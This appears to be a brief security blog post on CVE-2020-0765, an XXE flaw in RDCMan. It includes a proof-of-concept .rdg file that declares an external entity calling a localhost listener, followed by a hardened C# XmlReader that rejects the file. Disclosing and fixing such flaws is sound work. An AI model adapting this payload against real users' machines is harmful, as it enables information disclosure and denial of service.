March 11, 2020

CVE-2020-0765: Quick proof of concept

Remote Desktop Connection Manager (RDCMan) spins up ancient XmlReader and XmlTextReader instances without considering DTD and entity handling, so external entities declared in an .rdg file are resolved when the file is loaded. The result is a bag of information disclosure (and denial of service) vulnerabilities of the classic XXE kind. Here's a quick .rdg I put together to test against; the external entity points at a local listener so a successful resolution shows up as an incoming request.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT file (#PCDATA)>
<!ENTITY foo SYSTEM "http://localhost:11223/">]>
<RDCMan programVersion="2.7" schemaVersion="3">
  <file>
    <credentialsProfiles />
    <properties>
      <expanded>True</expanded>
      <name>test</name>
      <junk>&foo;</junk>
    </properties>
    <server>
      <properties>
        <name>test</name>
      </properties>
    </server>
  </file>
  <connected />
  <favorites />
  <recentlyUsed />
</RDCMan>
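For contrast, here is how the reader should be constructed on the .NET side so that the .rdg above is rejected before its SYSTEM entity is ever resolved. This is an added example, not RDCMan's code; the class and method names are my own, and it assumes the PoC has been saved to disk as the path given on the command line.

```csharp
using System;
using System.Xml;

// Added example, not RDCMan's code: a hardened reader for .rdg files.
static class SafeRdgReader
{
    // Settings that refuse any DOCTYPE and never resolve external resources,
    // so the SYSTEM entity in the PoC above is never fetched.
    public static XmlReaderSettings HardenedSettings() => new XmlReaderSettings
    {
        DtdProcessing = DtdProcessing.Prohibit,
        XmlResolver = null,
        MaxCharactersFromEntities = 1024, // extra guard against entity expansion
    };

    // Returns the text of the first <name> element, or null if there is none.
    // The legacy pattern this replaces is `new XmlTextReader(path)`, which on
    // .NET Framework defaults to DtdProcessing.Parse with an XmlUrlResolver,
    // so the DOCTYPE above is honoured and &foo; is expanded over the network.
    public static string ReadFirstName(string rdgPath)
    {
        using (var reader = XmlReader.Create(rdgPath, HardenedSettings()))
        {
            while (reader.Read())
            {
                if (reader.NodeType == XmlNodeType.Element && reader.Name == "name")
                    return reader.ReadElementContentAsString();
            }
        }
        return null;
    }

    // Usage: SafeRdgReader.exe poc.rdg (the PoC above saved to disk).
    static int Main(string[] args)
    {
        try
        {
            Console.WriteLine("first <name>: " + ReadFirstName(args[0]));
            return 0;
        }
        catch (XmlException e)
        {
            // The PoC lands here: the DOCTYPE is refused before any entity
            // is looked at, so the listener on port 11223 never sees a request.
            Console.WriteLine("rejected: " + e.Message);
            return 1;
        }
    }
}
```

A clean .rdg without a DOCTYPE parses normally under the same settings, so the hardening costs nothing for legitimate files.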